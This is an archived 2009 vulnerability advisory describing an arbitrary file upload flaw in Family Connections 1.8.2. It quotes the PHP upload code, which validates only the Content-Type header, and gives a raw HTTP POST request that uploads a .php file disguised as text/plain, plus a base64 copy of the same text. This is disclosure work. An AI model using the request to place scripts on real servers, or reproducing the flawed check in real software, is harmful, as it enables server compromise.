AOH :: HP Unsorted F :: VA3058.HTM

Family Connections 1.8.2 Arbitrary File Upload



Family Connections 1.8.2 Arbitrary File Upload
Family Connections 1.8.2 Arbitrary File Upload



--001636c5a7e8288d060466a8c0cc
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com 

[+] Bugs: [A] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 3 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Arbitrary File Upload

[-] Files affected: documents.php inc/documents_class.php

This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.

...

if (isset($_POST['submitadd'])) {
				$doc = $_FILES['doc']['name'];
				$desc = addslashes($_POST['desc']);
				if ($docs->uploadDocument($_FILES['doc']['type'],
$_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {
					
...

function uploadDocument ($filetype, $filename, $filetmpname) {
		global $LANG;
		$known_photo_types = array('application/msword' => 'doc',
'text/plain' => 'txt', 'application/excel' => 'xsl',
'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl',
			'application/x-compressed' => 'zip', 'application/x-zip-compressed'
=> 'zip', 'application/zip' => 'zip', 'multipart/x-zip' => 'zip',
'application/rtf' => 'rtf',
			'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf',
'application/mspowerpoint' => 'ppt', 'application/powerpoint' =>
'ppt', 'application/vnd.ms-powerpoint' => 'ppt',
			'application/x-mspowerpoint' => 'ppt', 'application/x-excel' =>
'xsl', 'application/pdf' => 'pdf');
		if (!array_key_exists($filetype, $known_photo_types)) {
			echo "

".$LANG['err_not_doc1']." $filetype ".$LANG['err_not_doc2']."
".$LANG['err_not_doc3']."

"; return false; } else { copy($filetmpname, "gallery/documents/$filename"); return true; } } ... ************************************************* [+] Code - [A] Arbitrary File Upload The following is an example of a malicious package: POST /fcms/upload.php HTTP/1.1\r\n Host: localhost\r\n Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n Content-type: multipart/form-data, boundary=AaB03x\r\n Content-Length: 295\r\n\r\n --AaB03x\r\n Content-Disposition: form-data; name="doc"; filename="file.php"\r\n Content-Type: text/plain\r\n \r\n \r\n --AaB03x\r\n Content-Disposition: form-data; name="desc"\r\n \r\n description\r\n --AaB03x\r\n Content-Disposition: form-data; name="submitadd"\r\n \r\n Submit\r\n --AaB03x--\r\n ************************************************* [+] Fix No fix. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351 --001636c5a7e8288d060466a8c0cc Content-Type: text/plain; charset=US-ASCII; name="Family Connections <= 1.8.2 Arbitrary File Upload-03042009.txt" Content-Disposition: attachment; filename="Family Connections <= 1.8.2 Arbitrary File Upload-03042009.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_ft32kazz0 KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw cGxpY2F0aW9uOiBGYW1pbHkgQ29ubmVjdGlvbgpbK10gVmVyc2lvbjogPD0gMS44LjIKWytdIFdl YnNpdGU6IGh0dHA6Ly93d3cuZmFtaWx5Y21zLmNvbQoKWytdIEJ1Z3M6IFtBXSBBcmJpdHJhcnkg RmlsZSBVcGxvYWQKClsrXSBFeHBsb2l0YXRpb246IFJlbW90ZQpbK10gRGF0ZTogMyBBcHIgMjAw OQoKWytdIERpc2NvdmVyZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBB dXRob3I6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6 IGRyb3NvcGhpbGF4eHhAZ21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVn cwoKCi0gW0FdIEFyYml0cmFyeSBGaWxlIFVwbG9hZAoKWy1dIEZpbGVzIGFmZmVjdGVkOiBkb2N1 bWVudHMucGhwIGluYy9kb2N1bWVudHNfY2xhc3MucGhwCgpUaGlzIGJ1ZyBhbGxvd3MgYSByZWdp c3RlcmVkIHVzZXIgdG8gdXBsb2FkIGFyYml0cmFyeSAKZmlsZXMgb24gdGhlIHN5c3RlbS4gVGhp cyBpcyBwb3NzaWJsZSBiZWNhdXNlIHRoZXJlIAphcmVuJ3QgY29udHJvbHMgb24gZmlsZSBleHRl bnNpb24gYnV0IG9uIHRoZSAKQ29udGVudC1UeXBlIGhlYWRlciBvbmx5LCB0aGF0IGNhbiBiZSBj aGFuZ2VkIGVhc2lseS4KCi4uLgoKaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0YWRkJ10pKSB7DQkJ CQkkZG9jID0gJF9GSUxFU1snZG9jJ11bJ25hbWUnXTsNCQkJCSRkZXNjID0gYWRkc2xhc2hlcygk X1BPU1RbJ2Rlc2MnXSk7DQkJCQlpZiAoJGRvY3MtPnVwbG9hZERvY3VtZW50KCRfRklMRVNbJ2Rv YyddWyd0eXBlJ10sICRfRklMRVNbJ2RvYyddWyduYW1lJ10sICRfRklMRVNbJ2RvYyddWyd0bXBf bmFtZSddKSkgewoJCQkJCQouLi4KCmZ1bmN0aW9uIHVwbG9hZERvY3VtZW50ICgkZmlsZXR5cGUs ICRmaWxlbmFtZSwgJGZpbGV0bXBuYW1lKSB7DQkJZ2xvYmFsICRMQU5HOw0JCSRrbm93bl9waG90 b190eXBlcyA9IGFycmF5KCdhcHBsaWNhdGlvbi9tc3dvcmQnID0+ICdkb2MnLCAndGV4dC9wbGFp bicgPT4gJ3R4dCcsICdhcHBsaWNhdGlvbi9leGNlbCcgPT4gJ3hzbCcsICdhcHBsaWNhdGlvbi92 bmQubXMtZXhjZWwnID0+ICd4c2wnLCAnYXBwbGljYXRpb24veC1tc2V4Y2VsJyA9PiAneHNsJywg DQkJCSdhcHBsaWNhdGlvbi94LWNvbXByZXNzZWQnID0+ICd6aXAnLCAnYXBwbGljYXRpb24veC16 aXAtY29tcHJlc3NlZCcgPT4gJ3ppcCcsICdhcHBsaWNhdGlvbi96aXAnID0+ICd6aXAnLCAnbXVs dGlwYXJ0L3gtemlwJyA9PiAnemlwJywgJ2FwcGxpY2F0aW9uL3J0ZicgPT4gJ3J0ZicsIA0JCQkn YXBwbGljYXRpb24veC1ydGYnID0+ICdydGYnLCAndGV4dC9yaWNodGV4dCcgPT4gJ3J0ZicsICdh cHBsaWNhdGlvbi9tc3Bvd2VycG9pbnQnID0+ICdwcHQnLCAnYXBwbGljYXRpb24vcG93ZXJwb2lu dCcgPT4gJ3BwdCcsICdhcHBsaWNhdGlvbi92bmQubXMtcG93ZXJwb2ludCcgPT4gJ3BwdCcsIA0J CQknYXBwbGljYXRpb24veC1tc3Bvd2VycG9pbnQnID0+ICdwcHQnLCAnYXBwbGljYXRpb24veC1l eGNlbCcgPT4gJ3hzbCcsICdhcHBsaWNhdGlvbi9wZGYnID0+ICdwZGYnKTsNCQlpZiAoIWFycmF5 X2tleV9leGlzdHMoJGZpbGV0eXBlLCAka25vd25fcGhvdG9fdHlwZXMpKSB7DQkJCWVjaG8gIjxw IGNsYXNzPVwiZXJyb3ItYWxlcnRcIj4iLiRMQU5HWydlcnJfbm90X2RvYzEnXS4iICRmaWxldHlw ZSAiLiRMQU5HWydlcnJfbm90X2RvYzInXS4iPGJyLz4iLiRMQU5HWydlcnJfbm90X2RvYzMnXS4i PC9wPiI7DQkJCXJldHVybiBmYWxzZTsNCQl9IGVsc2Ugew0JCQljb3B5KCRmaWxldG1wbmFtZSwg ImdhbGxlcnkvZG9jdW1lbnRzLyRmaWxlbmFtZSIpOw0JCQlyZXR1cm4gdHJ1ZTsNCQl9DQl9CgkK Li4uDQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioK ClsrXSBDb2RlCgoKLSBbQV0gQXJiaXRyYXJ5IEZpbGUgVXBsb2FkCgpUaGUgZm9sbG93aW5nIGlz IGFuIGV4YW1wbGUgb2YgYSBtYWxpY2lvdXMgcGFja2FnZToKClBPU1QgL2ZjbXMvdXBsb2FkLnBo cCBIVFRQLzEuMVxyXG4KSG9zdDogbG9jYWxob3N0XHJcbgpDb29raWU6IFBIUFNFU1NJRD01MGZi MTEzNWMyZGE3ZjYwYmI2NmViMzVjYmM2YWI5N1xyXG4KQ29udGVudC10eXBlOiBtdWx0aXBhcnQv Zm9ybS1kYXRhLCBib3VuZGFyeT1BYUIwM3hcclxuCkNvbnRlbnQtTGVuZ3RoOiAyOTVcclxuXHJc bgotLUFhQjAzeFxyXG4KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJkb2Mi OyBmaWxlbmFtZT0iZmlsZS5waHAiXHJcbgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW5cclxuClxy XG4KPD9waHAgZWNobyAiVGhpcyBpcyBub3QgYSB0ZXh0IGZpbGUiPz5cclxuCi0tQWFCMDN4XHJc bgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImRlc2MiXHJcbgpcclxuCmRl c2NyaXB0aW9uXHJcbgotLUFhQjAzeFxyXG4KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRh OyBuYW1lPSJzdWJtaXRhZGQiXHJcbgpcclxuClN1Ym1pdFxyXG4KLS1BYUIwM3gtLVxyXG4KCgoq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gRml4 CgpObyBmaXguCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKg=--001636c5a7e8288d060466a8c0cc--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.